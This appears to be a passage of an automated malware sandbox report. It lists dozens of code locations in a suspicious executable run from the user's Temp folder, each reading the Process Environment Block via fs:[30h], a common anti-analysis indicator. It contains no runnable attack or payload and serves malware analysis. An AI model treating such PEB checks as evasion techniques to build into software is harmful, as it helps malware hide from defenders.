Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01664120 mov eax, dword ptr fs:[00000030h] 2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01664120 mov ecx, dword ptr fs:[00000030h] 2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h] 2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h] 2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h] 2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h] 2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h] 2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h] 2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h] 2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h] 2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h] 2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h] 2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h] 2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h] 2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h] 2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164AD30 mov eax, dword ptr fs:[00000030h] 2_2_0164AD30
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016CA537 mov eax, dword ptr fs:[00000030h] 2_2_016CA537
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01674D3B mov eax, dword ptr fs:[00000030h] 2_2_01674D3B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01674D3B mov eax, dword ptr fs:[00000030h] 2_2_01674D3B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01674D3B mov eax, dword ptr fs:[00000030h] 2_2_01674D3B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167513A mov eax, dword ptr fs:[00000030h] 2_2_0167513A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167513A mov eax, dword ptr fs:[00000030h] 2_2_0167513A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01649100 mov eax, dword ptr fs:[00000030h] 2_2_01649100
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01649100 mov eax, dword ptr fs:[00000030h] 2_2_01649100
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01649100 mov eax, dword ptr fs:[00000030h] 2_2_01649100
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0164B1E1
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0164B1E1
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0164B1E1
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016D41E8 mov eax, dword ptr fs:[00000030h] 2_2_016D41E8
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0165D5E0 mov eax, dword ptr fs:[00000030h] 2_2_0165D5E0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0165D5E0 mov eax, dword ptr fs:[00000030h] 2_2_0165D5E0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016F8DF1 mov eax, dword ptr fs:[00000030h] 2_2_016F8DF1
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016735A1 mov eax, dword ptr fs:[00000030h] 2_2_016735A1
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016761A0 mov eax, dword ptr fs:[00000030h] 2_2_016761A0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016761A0 mov eax, dword ptr fs:[00000030h] 2_2_016761A0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C69A6 mov eax, dword ptr fs:[00000030h] 2_2_016C69A6
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01671DB5 mov eax, dword ptr fs:[00000030h] 2_2_01671DB5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01671DB5 mov eax, dword ptr fs:[00000030h] 2_2_01671DB5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01671DB5 mov eax, dword ptr fs:[00000030h] 2_2_01671DB5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h] 2_2_016C51BE
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h] 2_2_016C51BE
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h] 2_2_016C51BE
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h] 2_2_016C51BE
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167A185 mov eax, dword ptr fs:[00000030h] 2_2_0167A185
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0166C182 mov eax, dword ptr fs:[00000030h] 2_2_0166C182
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01672581 mov eax, dword ptr fs:[00000030h] 2_2_01672581
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01672581 mov eax, dword ptr fs:[00000030h] 2_2_01672581
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01672581 mov eax, dword ptr fs:[00000030h] 2_2_01672581
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01672581 mov eax, dword ptr fs:[00000030h] 2_2_01672581
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h] 2_2_01642D8A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h] 2_2_01642D8A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h] 2_2_01642D8A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h] 2_2_01642D8A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h] 2_2_01642D8A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01672990 mov eax, dword ptr fs:[00000030h] 2_2_01672990
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167FD9B mov eax, dword ptr fs:[00000030h] 2_2_0167FD9B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167FD9B mov eax, dword ptr fs:[00000030h] 2_2_0167FD9B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01702073 mov eax, dword ptr fs:[00000030h] 2_2_01702073
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01711074 mov eax, dword ptr fs:[00000030h] 2_2_01711074
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0166746D mov eax, dword ptr fs:[00000030h] 2_2_0166746D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167A44B mov eax, dword ptr fs:[00000030h] 2_2_0167A44B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01660050 mov eax, dword ptr fs:[00000030h] 2_2_01660050
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01660050 mov eax, dword ptr fs:[00000030h] 2_2_01660050
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016DC450 mov eax, dword ptr fs:[00000030h] 2_2_016DC450
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016DC450 mov eax, dword ptr fs:[00000030h] 2_2_016DC450
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h] 2_2_0167002D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h] 2_2_0167002D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h] 2_2_0167002D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h] 2_2_0167002D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h] 2_2_0167002D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167BC2C mov eax, dword ptr fs:[00000030h] 2_2_0167BC2C
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h] 2_2_0165B02A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h] 2_2_0165B02A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h] 2_2_0165B02A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h] 2_2_0165B02A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01714015 mov eax, dword ptr fs:[00000030h] 2_2_01714015
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01714015 mov eax, dword ptr fs:[00000030h] 2_2_01714015
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h] 2_2_016C6C0A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h] 2_2_016C6C0A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h] 2_2_016C6C0A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h] 2_2_016C6C0A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h] 2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h] 2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h] 2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h] 2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h] 2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h] 2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h] 2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h] 2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h] 2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h] 2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h] 2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h] 2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h] 2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h] 2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C7016 mov eax, dword ptr fs:[00000030h] 2_2_016C7016
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C7016 mov eax, dword ptr fs:[00000030h] 2_2_016C7016
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C7016 mov eax, dword ptr fs:[00000030h] 2_2_016C7016
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0171740D mov eax, dword ptr fs:[00000030h] 2_2_0171740D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0171740D mov eax, dword ptr fs:[00000030h] 2_2_0171740D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0171740D mov eax, dword ptr fs:[00000030h] 2_2_0171740D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_017014FB mov eax, dword ptr fs:[00000030h] 2_2_017014FB
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C6CF0 mov eax, dword ptr fs:[00000030h] 2_2_016C6CF0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C6CF0 mov eax, dword ptr fs:[00000030h] 2_2_016C6CF0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C6CF0 mov eax, dword ptr fs:[00000030h] 2_2_016C6CF0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01718CD6 mov eax, dword ptr fs:[00000030h] 2_2_01718CD6
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h] 2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016DB8D0 mov ecx, dword ptr fs:[00000030h] 2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h] 2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h] 2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h] 2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h] 2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016890AF mov eax, dword ptr fs:[00000030h] 2_2_016890AF
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167F0BF mov ecx, dword ptr fs:[00000030h] 2_2_0167F0BF
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167F0BF mov eax, dword ptr fs:[00000030h] 2_2_0167F0BF
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167F0BF mov eax, dword ptr fs:[00000030h] 2_2_0167F0BF
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01649080 mov eax, dword ptr fs:[00000030h] 2_2_01649080
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C3884 mov eax, dword ptr fs:[00000030h] 2_2_016C3884
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C3884 mov eax, dword ptr fs:[00000030h] 2_2_016C3884
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0165849B mov eax, dword ptr fs:[00000030h] 2_2_0165849B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164DB60 mov ecx, dword ptr fs:[00000030h] 2_2_0164DB60
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0165FF60 mov eax, dword ptr fs:[00000030h] 2_2_0165FF60
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01718F6A mov eax, dword ptr fs:[00000030h] 2_2_01718F6A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01673B7A mov eax, dword ptr fs:[00000030h] 2_2_01673B7A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01673B7A mov eax, dword ptr fs:[00000030h] 2_2_01673B7A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164DB40 mov eax, dword ptr fs:[00000030h] 2_2_0164DB40
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0165EF40 mov eax, dword ptr fs:[00000030h] 2_2_0165EF40
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01718B58 mov eax, dword ptr fs:[00000030h] 2_2_01718B58
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164F358 mov eax, dword ptr fs:[00000030h] 2_2_0164F358
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01644F2E mov eax, dword ptr fs:[00000030h] 2_2_01644F2E
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01644F2E mov eax, dword ptr fs:[00000030h] 2_2_01644F2E
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167E730 mov eax, dword ptr fs:[00000030h] 2_2_0167E730
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167A70E mov eax, dword ptr fs:[00000030h] 2_2_0167A70E
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167A70E mov eax, dword ptr fs:[00000030h] 2_2_0167A70E
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0170131B mov eax, dword ptr fs:[00000030h] 2_2_0170131B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0166F716 mov eax, dword ptr fs:[00000030h] 2_2_0166F716
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0171070D mov eax, dword ptr fs:[00000030h] 2_2_0171070D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0171070D mov eax, dword ptr fs:[00000030h] 2_2_0171070D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016DFF10 mov eax, dword ptr fs:[00000030h] 2_2_016DFF10
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016DFF10 mov eax, dword ptr fs:[00000030h] 2_2_016DFF10
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h] 2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h] 2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h] 2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h] 2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h] 2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h] 2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016837F5 mov eax, dword ptr fs:[00000030h] 2_2_016837F5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C53CA mov eax, dword ptr fs:[00000030h] 2_2_016C53CA
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C53CA mov eax, dword ptr fs:[00000030h] 2_2_016C53CA
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01715BA5 mov eax, dword ptr fs:[00000030h] 2_2_01715BA5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01651B8F mov eax, dword ptr fs:[00000030h] 2_2_01651B8F
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01651B8F mov eax, dword ptr fs:[00000030h] 2_2_01651B8F
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016FD380 mov ecx, dword ptr fs:[00000030h] 2_2_016FD380
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01672397 mov eax, dword ptr fs:[00000030h] 2_2_01672397
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01658794 mov eax, dword ptr fs:[00000030h] 2_2_01658794
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167B390 mov eax, dword ptr fs:[00000030h] 2_2_0167B390
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C7794 mov eax, dword ptr fs:[00000030h] 2_2_016C7794
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C7794 mov eax, dword ptr fs:[00000030h] 2_2_016C7794
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016C7794 mov eax, dword ptr fs:[00000030h] 2_2_016C7794
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0170138A mov eax, dword ptr fs:[00000030h] 2_2_0170138A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0165766D mov eax, dword ptr fs:[00000030h] 2_2_0165766D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016FB260 mov eax, dword ptr fs:[00000030h] 2_2_016FB260
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016FB260 mov eax, dword ptr fs:[00000030h] 2_2_016FB260
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0168927A mov eax, dword ptr fs:[00000030h] 2_2_0168927A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01718A62 mov eax, dword ptr fs:[00000030h] 2_2_01718A62
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h] 2_2_0166AE73
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h] 2_2_0166AE73
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h] 2_2_0166AE73
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h] 2_2_0166AE73
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h] 2_2_0166AE73
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01649240 mov eax, dword ptr fs:[00000030h] 2_2_01649240
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01649240 mov eax, dword ptr fs:[00000030h] 2_2_01649240
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01649240 mov eax, dword ptr fs:[00000030h] 2_2_01649240
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01649240 mov eax, dword ptr fs:[00000030h] 2_2_01649240
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h] 2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h] 2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h] 2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h] 2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h] 2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h] 2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016D4257 mov eax, dword ptr fs:[00000030h] 2_2_016D4257
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164E620 mov eax, dword ptr fs:[00000030h] 2_2_0164E620
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016FFE3F mov eax, dword ptr fs:[00000030h] 2_2_016FFE3F
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164C600 mov eax, dword ptr fs:[00000030h] 2_2_0164C600
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164C600 mov eax, dword ptr fs:[00000030h] 2_2_0164C600
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164C600 mov eax, dword ptr fs:[00000030h] 2_2_0164C600
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01678E00 mov eax, dword ptr fs:[00000030h] 2_2_01678E00
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01658A0A mov eax, dword ptr fs:[00000030h] 2_2_01658A0A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164AA16 mov eax, dword ptr fs:[00000030h] 2_2_0164AA16
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0164AA16 mov eax, dword ptr fs:[00000030h] 2_2_0164AA16
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01663A1C mov eax, dword ptr fs:[00000030h] 2_2_01663A1C
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167A61C mov eax, dword ptr fs:[00000030h] 2_2_0167A61C
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_0167A61C mov eax, dword ptr fs:[00000030h] 2_2_0167A61C
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01672AE4 mov eax, dword ptr fs:[00000030h] 2_2_01672AE4
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016716E0 mov ecx, dword ptr fs:[00000030h] 2_2_016716E0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016576E2 mov eax, dword ptr fs:[00000030h] 2_2_016576E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01718ED6 mov eax, dword ptr fs:[00000030h] 2_2_01718ED6
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016736CC mov eax, dword ptr fs:[00000030h] 2_2_016736CC
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01672ACB mov eax, dword ptr fs:[00000030h] 2_2_01672ACB
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_016FFEC0 mov eax, dword ptr fs:[00000030h] 2_2_016FFEC0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 2_2_01688EC7 mov eax, dword ptr fs:[00000030h] 2_2_01688EC7
